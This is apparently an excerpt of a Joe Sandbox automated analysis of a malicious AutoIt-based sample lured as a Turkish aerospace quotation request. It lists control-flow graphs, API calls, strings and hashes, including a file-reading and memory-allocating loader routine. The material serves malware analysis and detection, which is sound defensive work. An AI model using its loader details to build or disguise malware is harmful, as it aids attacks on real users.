                                                                                                                                    control_flow_graph 302 1c065b-1c068b call 1c042f 305 1c068d-1c0698 call 1af2c6 302->305 306 1c06a6-1c06b2 call 1b5221 302->306 313 1c069a-1c06a1 call 1af2d9 305->313 311 1c06cb-1c0714 call 1c039a 306->311 312 1c06b4-1c06c9 call 1af2c6 call 1af2d9 306->312 321 1c0716-1c071f 311->321 322 1c0781-1c078a GetFileType 311->322 312->313 323 1c097d-1c0983 313->323 327 1c0756-1c077c GetLastError call 1af2a3 321->327 328 1c0721-1c0725 321->328 324 1c078c-1c07bd GetLastError call 1af2a3 CloseHandle 322->324 325 1c07d3-1c07d6 322->325 324->313 339 1c07c3-1c07ce call 1af2d9 324->339 330 1c07df-1c07e5 325->330 331 1c07d8-1c07dd 325->331 327->313 328->327 332 1c0727-1c0754 call 1c039a 328->332 335 1c07e9-1c0837 call 1b516a 330->335 336 1c07e7 330->336 331->335 332->322 332->327 345 1c0839-1c0845 call 1c05ab 335->345 346 1c0847-1c086b call 1c014d 335->346 336->335 339->313 345->346 351 1c086f-1c0879 call 1b86ae 345->351 352 1c086d 346->352 353 1c087e-1c08c1 346->353 351->323 352->351 355 1c08e2-1c08f0 353->355 356 1c08c3-1c08c7 353->356 359 1c097b 355->359 360 1c08f6-1c08fa 355->360 356->355 358 1c08c9-1c08dd 356->358 358->355 359->323 360->359 361 1c08fc-1c092f CloseHandle call 1c039a 360->361 364 1c0931-1c095d GetLastError call 1af2a3 call 1b5333 361->364 365 1c0963-1c0977 361->365 364->365 365->359
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001C039A: CreateFileW.KERNELBASE(00000000,00000000,?,001C0704,?,?,00000000,?,001C0704,00000000,0000000C), ref: 001C03B7
                                                                                                                                    • GetLastError.KERNEL32 ref: 001C076F
                                                                                                                                    • __dosmaperr.LIBCMT ref: 001C0776
                                                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 001C0782
                                                                                                                                    • GetLastError.KERNEL32 ref: 001C078C
                                                                                                                                    • __dosmaperr.LIBCMT ref: 001C0795
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001C07B5
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001C08FF
                                                                                                                                    • GetLastError.KERNEL32 ref: 001C0931
                                                                                                                                    • __dosmaperr.LIBCMT ref: 001C0938
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                    • String ID: H
                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                    • Opcode ID: 4f5c80816de6cfe6a5f55cbd4e3542f74a79bb8f584a5a5acbb1db9813c54f40
                                                                                                                                    • Instruction ID: 22829b52e981022966645ad59624b27959c15ac7e10eb6b5075344533a346a07
                                                                                                                                    • Opcode Fuzzy Hash: 4f5c80816de6cfe6a5f55cbd4e3542f74a79bb8f584a5a5acbb1db9813c54f40
                                                                                                                                    • Instruction Fuzzy Hash: 2EA13836A00254CFDF1AAF68DC95BAE7BA0AB2A320F14415DF8159B291DB31DD12CB91

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00183A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00251418,?,00182E7F,?,?,?,00000000), ref: 00183A78
                                                                                                                                      • Part of subcall function 00183357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00183379
                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0018356A
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001C318D
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001C31CE
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001C3210
                                                                                                                                    • _wcslen.LIBCMT ref: 001C3277
                                                                                                                                    • _wcslen.LIBCMT ref: 001C3286
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                    • API String ID: 98802146-2727554177
                                                                                                                                    • Opcode ID: 5ef4d1303c2ee515b3e864c4ef85e1c49fc617e9f84e14f48f9e52f51b599525
                                                                                                                                    • Instruction ID: 749153e68bb5ae998a8e17e54eac92efc47ef26f46047da676c8f0b3b7acd29c
                                                                                                                                    • Opcode Fuzzy Hash: 5ef4d1303c2ee515b3e864c4ef85e1c49fc617e9f84e14f48f9e52f51b599525
                                                                                                                                    • Instruction Fuzzy Hash: 44718D71408301EFC704EF65EC869ABBBE8FFAA740F50446EF455971A0EB309A48CB56

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00182B8E
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00182B9D
                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00182BB3
                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00182BC5
                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00182BD7
                                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00182BEF
                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00182C40
                                                                                                                                      • Part of subcall function 00182CD4: GetSysColorBrush.USER32(0000000F), ref: 00182D07
                                                                                                                                      • Part of subcall function 00182CD4: RegisterClassExW.USER32(00000030), ref: 00182D31
                                                                                                                                      • Part of subcall function 00182CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00182D42
                                                                                                                                      • Part of subcall function 00182CD4: InitCommonControlsEx.COMCTL32(?), ref: 00182D5F
                                                                                                                                      • Part of subcall function 00182CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00182D6F
                                                                                                                                      • Part of subcall function 00182CD4: LoadIconW.USER32(000000A9), ref: 00182D85
                                                                                                                                      • Part of subcall function 00182CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00182D94
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                    • Opcode ID: 0ecb30c4fe42388e855d31211f22df3a4acf6a4087512f836ef4fad8930feb4f
                                                                                                                                    • Instruction ID: 7ffa6b085de5f43a68578f41ba0679e355d9d8ab6df9a20ed5990d62f169125b
                                                                                                                                    • Opcode Fuzzy Hash: 0ecb30c4fe42388e855d31211f22df3a4acf6a4087512f836ef4fad8930feb4f
                                                                                                                                    • Instruction Fuzzy Hash: 9F214F74E40314BBDB109F95FC6DBAABFB4FB08B51F14419AF500A66A0D7B10960CF98

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 443 183170-183185 444 1831e5-1831e7 443->444 445 183187-18318a 443->445 444->445 448 1831e9 444->448 446 1831eb 445->446 447 18318c-183193 445->447 449 1c2dfb-1c2e23 call 1818e2 call 19e499 446->449 450 1831f1-1831f6 446->450 451 183199-18319e 447->451 452 183265-18326d PostQuitMessage 447->452 453 1831d0-1831d8 DefWindowProcW 448->453 489 1c2e28-1c2e2f 449->489 454 1831f8-1831fb 450->454 455 18321d-183244 SetTimer RegisterWindowMessageW 450->455 457 1c2e7c-1c2e90 call 1ebf30 451->457 458 1831a4-1831a8 451->458 460 183219-18321b 452->460 459 1831de-1831e4 453->459 461 1c2d9c-1c2d9f 454->461 462 183201-183214 KillTimer call 1830f2 call 183c50 454->462 455->460 464 183246-183251 CreatePopupMenu 455->464 457->460 482 1c2e96 457->482 465 1c2e68-1c2e72 call 1ec161 458->465 466 1831ae-1831b3 458->466 460->459 474 1c2dd7-1c2df6 MoveWindow 461->474 475 1c2da1-1c2da5 461->475 462->460 464->460 478 1c2e77 465->478 471 1c2e4d-1c2e54 466->471 472 1831b9-1831be 466->472 471->453 476 1c2e5a-1c2e63 call 1e0ad7 471->476 480 183253-183263 call 18326f 472->480 481 1831c4-1831ca 472->481 474->460 483 1c2dc6-1c2dd2 SetFocus 475->483 484 1c2da7-1c2daa 475->484 476->453 478->460 480->460 481->453 481->489 482->453 483->460 484->481 485 1c2db0-1c2dc1 call 1818e2 484->485 485->460 489->453 493 1c2e35-1c2e48 call 1830f2 call 183837 489->493 493->453
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0018316A,?,?), ref: 001831D8
                                                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,0018316A,?,?), ref: 00183204
                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00183227
                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0018316A,?,?), ref: 00183232
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00183246
                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00183267
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                    • Opcode ID: b914263bdc09815788c016ff7563ceca6abb21797c8ac656e5d2f4098f5f0131
                                                                                                                                    • Instruction ID: 97f8f43803be92239aa2a6e560621ca8359a41c99ea358376c102c5a16605113
                                                                                                                                    • Opcode Fuzzy Hash: b914263bdc09815788c016ff7563ceca6abb21797c8ac656e5d2f4098f5f0131
                                                                                                                                    • Instruction Fuzzy Hash: 82412939250304B7DB183B78AC1DBBD3A1AE725F01F1C4129F922862E1DBB1DB519F65
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: D%%$D%%$D%%$D%%$D%%D%%$Variable must be of type 'Object'.
                                                                                                                                    • API String ID: 0-3578055194
                                                                                                                                    • Opcode ID: 522562a127317f4e95e4d2ce102ac0937332783929e6dc51818e138adf7a41d8
                                                                                                                                    • Instruction ID: 39b60fc947e51d3b2e0d66d8bbb68c430e4f83aa97f92571fed9b995f525810e
                                                                                                                                    • Opcode Fuzzy Hash: 522562a127317f4e95e4d2ce102ac0937332783929e6dc51818e138adf7a41d8
                                                                                                                                    • Instruction Fuzzy Hash: B0C28A71A00205DFCB24EF98C884AADB7F1BF19310F25856AE916AB391D375EE41CF91

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1009 1b8d45-1b8d55 1010 1b8d6f-1b8d71 1009->1010 1011 1b8d57-1b8d6a call 1af2c6 call 1af2d9 1009->1011 1013 1b90d9-1b90e6 call 1af2c6 call 1af2d9 1010->1013 1014 1b8d77-1b8d7d 1010->1014 1028 1b90f1 1011->1028 1033 1b90ec call 1b27ec 1013->1033 1014->1013 1017 1b8d83-1b8dae 1014->1017 1017->1013 1018 1b8db4-1b8dbd 1017->1018 1021 1b8dbf-1b8dd2 call 1af2c6 call 1af2d9 1018->1021 1022 1b8dd7-1b8dd9 1018->1022 1021->1033 1026 1b8ddf-1b8de3 1022->1026 1027 1b90d5-1b90d7 1022->1027 1026->1027 1032 1b8de9-1b8ded 1026->1032 1030 1b90f4-1b90f9 1027->1030 1028->1030 1032->1021 1036 1b8def-1b8e06 1032->1036 1033->1028 1038 1b8e08-1b8e0b 1036->1038 1039 1b8e23-1b8e2c 1036->1039 1040 1b8e0d-1b8e13 1038->1040 1041 1b8e15-1b8e1e 1038->1041 1042 1b8e4a-1b8e54 1039->1042 1043 1b8e2e-1b8e45 call 1af2c6 call 1af2d9 call 1b27ec 1039->1043 1040->1041 1040->1043 1046 1b8ebf-1b8ed9 1041->1046 1044 1b8e5b-1b8e79 call 1b3820 call 1b29c8 * 2 1042->1044 1045 1b8e56-1b8e58 1042->1045 1072 1b900c 1043->1072 1082 1b8e7b-1b8e91 call 1af2d9 call 1af2c6 1044->1082 1083 1b8e96-1b8ebc call 1b9424 1044->1083 1045->1044 1049 1b8edf-1b8eef 1046->1049 1050 1b8fad-1b8fb6 call 1bf89b 1046->1050 1049->1050 1054 1b8ef5-1b8ef7 1049->1054 1061 1b9029 1050->1061 1062 1b8fb8-1b8fca 1050->1062 1054->1050 1058 1b8efd-1b8f23 1054->1058 1058->1050 1063 1b8f29-1b8f3c 1058->1063 1065 1b902d-1b9045 ReadFile 1061->1065 1062->1061 1067 1b8fcc-1b8fdb GetConsoleMode 1062->1067 1063->1050 1068 1b8f3e-1b8f40 1063->1068 1070 1b90a1-1b90ac GetLastError 1065->1070 1071 1b9047-1b904d 1065->1071 1067->1061 1073 1b8fdd-1b8fe1 1067->1073 1068->1050 1074 1b8f42-1b8f6d 1068->1074 1076 1b90ae-1b90c0 call 1af2d9 call 1af2c6 1070->1076 1077 1b90c5-1b90c8 1070->1077 1071->1070 1078 1b904f 1071->1078 1080 1b900f-1b9019 call 1b29c8 1072->1080 1073->1065 1079 1b8fe3-1b8ffd ReadConsoleW 1073->1079 1074->1050 1081 1b8f6f-1b8f82 1074->1081 1076->1072 1089 1b90ce-1b90d0 1077->1089 1090 1b9005-1b900b call 1af2a3 1077->1090 1085 1b9052-1b9064 1078->1085 1087 1b8fff GetLastError 1079->1087 1088 1b901e-1b9027 1079->1088 1080->1030 1081->1050 1092 1b8f84-1b8f86 1081->1092 1082->1072 1083->1046 1085->1080 1096 1b9066-1b906a 1085->1096 1087->1090 1088->1085 1089->1080 1090->1072 1092->1050 1100 1b8f88-1b8fa8 1092->1100 1103 1b906c-1b907c call 1b8a61 1096->1103 1104 1b9083-1b908e 1096->1104 1100->1050 1115 1b907f-1b9081 1103->1115 1109 1b909a-1b909f call 1b88a1 1104->1109 1110 1b9090 call 1b8bb1 1104->1110 1116 1b9095-1b9098 1109->1116 1110->1116 1115->1080 1116->1115
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b6a7472c552cadfa919779b8d792b95b503247e7616fa6f01cbc7897fb2f86a9
                                                                                                                                    • Instruction ID: e162a0a3fa98ded364c15e60ea0c2588a42fe943e6ae680b99dee1c16198b55f
                                                                                                                                    • Opcode Fuzzy Hash: b6a7472c552cadfa919779b8d792b95b503247e7616fa6f01cbc7897fb2f86a9
                                                                                                                                    • Instruction Fuzzy Hash: E3C1D374904349AFDB11EFE8D885BEDBBB8AF19310F144199F919A7392CB309942CB61

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1117 18a0d98-18a0e46 call 189e7d8 1120 18a0e4d-18a0e73 call 18a1ca8 CreateFileW 1117->1120 1123 18a0e7a-18a0e8a 1120->1123 1124 18a0e75 1120->1124 1129 18a0e8c 1123->1129 1130 18a0e91-18a0eab VirtualAlloc 1123->1130 1125 18a0fc5-18a0fc9 1124->1125 1126 18a100b-18a100e 1125->1126 1127 18a0fcb-18a0fcf 1125->1127 1131 18a1011-18a1018 1126->1131 1132 18a0fdb-18a0fdf 1127->1132 1133 18a0fd1-18a0fd4 1127->1133 1129->1125 1134 18a0ead 1130->1134 1135 18a0eb2-18a0ec9 ReadFile 1130->1135 1136 18a101a-18a1025 1131->1136 1137 18a106d-18a1082 1131->1137 1138 18a0fef-18a0ff3 1132->1138 1139 18a0fe1-18a0feb 1132->1139 1133->1132 1134->1125 1142 18a0ecb 1135->1142 1143 18a0ed0-18a0f10 VirtualAlloc 1135->1143 1144 18a1029-18a1035 1136->1144 1145 18a1027 1136->1145 1146 18a1092-18a109a 1137->1146 1147 18a1084-18a108f VirtualFree 1137->1147 1140 18a1003 1138->1140 1141 18a0ff5-18a0fff 1138->1141 1139->1138 1140->1126 1141->1140 1142->1125 1148 18a0f12 1143->1148 1149 18a0f17-18a0f32 call 18a1ef8 1143->1149 1150 18a1049-18a1055 1144->1150 1151 18a1037-18a1047 1144->1151 1145->1137 1147->1146 1148->1125 1157 18a0f3d-18a0f47 1149->1157 1154 18a1062-18a1068 1150->1154 1155 18a1057-18a1060 1150->1155 1153 18a106b 1151->1153 1153->1131 1154->1153 1155->1153 1158 18a0f7a-18a0f8e call 18a1d08 1157->1158 1159 18a0f49-18a0f78 call 18a1ef8 1157->1159 1164 18a0f92-18a0f96 1158->1164 1165 18a0f90 1158->1165 1159->1157 1167 18a0f98-18a0f9c CloseHandle 1164->1167 1168 18a0fa2-18a0fa6 1164->1168 1165->1125 1167->1168 1169 18a0fa8-18a0fb3 VirtualFree 1168->1169 1170 18a0fb6-18a0fbf 1168->1170 1169->1170 1170->1120 1170->1125
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 018A0E69
                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 018A108F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 204039940-0
                                                                                                                                    • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                                                                                                    • Instruction ID: aadab0157dd1b30fa376d309bd8f625d5117f3b36dfe8588c8dae01741b4d55a
                                                                                                                                    • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                                                                                                    • Instruction Fuzzy Hash: FFA12B70E00209EBEB14CFA4C998BEEBBB5FF48705F508159E611BB281D7759A80CF51

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1181 182c63-182cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00182C91
                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00182CB2
                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00181CAD,?), ref: 00182CC6
                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00181CAD,?), ref: 00182CCF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                    • Opcode ID: 4036a1199a05087fa7f9530c9834e26f10dc6f8cf6b827b2404568043fd6f904
                                                                                                                                    • Instruction ID: 119539880ede92443bfda192423c94b6778ce302c61fee4dc3cc4d27e90b6d44
                                                                                                                                    • Opcode Fuzzy Hash: 4036a1199a05087fa7f9530c9834e26f10dc6f8cf6b827b2404568043fd6f904
                                                                                                                                    • Instruction Fuzzy Hash: E6F03A795803907AEB300713BC1CFB76EBDD7D6F61F11409AF900A21B0C6710861DAB8

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1296 18a0b88-18a0c8e call 189e7d8 call 18a0a78 CreateFileW 1303 18a0c90 1296->1303 1304 18a0c95-18a0ca5 1296->1304 1305 18a0d45-18a0d4a 1303->1305 1307 18a0cac-18a0cc6 VirtualAlloc 1304->1307 1308 18a0ca7 1304->1308 1309 18a0cca-18a0ce1 ReadFile 1307->1309 1310 18a0cc8 1307->1310 1308->1305 1311 18a0ce3 1309->1311 1312 18a0ce5-18a0d1f call 18a0ab8 call 189fa78 1309->1312 1310->1305 1311->1305 1317 18a0d3b-18a0d43 ExitProcess 1312->1317 1318 18a0d21-18a0d36 call 18a0b08 1312->1318 1317->1305 1318->1317
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 018A0A78: Sleep.KERNELBASE(000001F4), ref: 018A0A89
                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 018A0C84
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFileSleep
                                                                                                                                    • String ID: K7H3K4M4QE94QO5YC2
                                                                                                                                    • API String ID: 2694422964-3904854718
                                                                                                                                    • Opcode ID: 387a74b5aa3291fabe28d2796e7e4eb3a43b7f08d13cf23704fa8aca1cedcb40
                                                                                                                                    • Instruction ID: 8ab1fea683d84b11c0dd189fc22a24836582e19147c167934bc9a98555e126ed
                                                                                                                                    • Opcode Fuzzy Hash: 387a74b5aa3291fabe28d2796e7e4eb3a43b7f08d13cf23704fa8aca1cedcb40
                                                                                                                                    • Instruction Fuzzy Hash: 8451B431D0424DDBEF11DBA8C808BEEBBB8AF15304F404599E609BB2C1D7B91B45CBA1

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
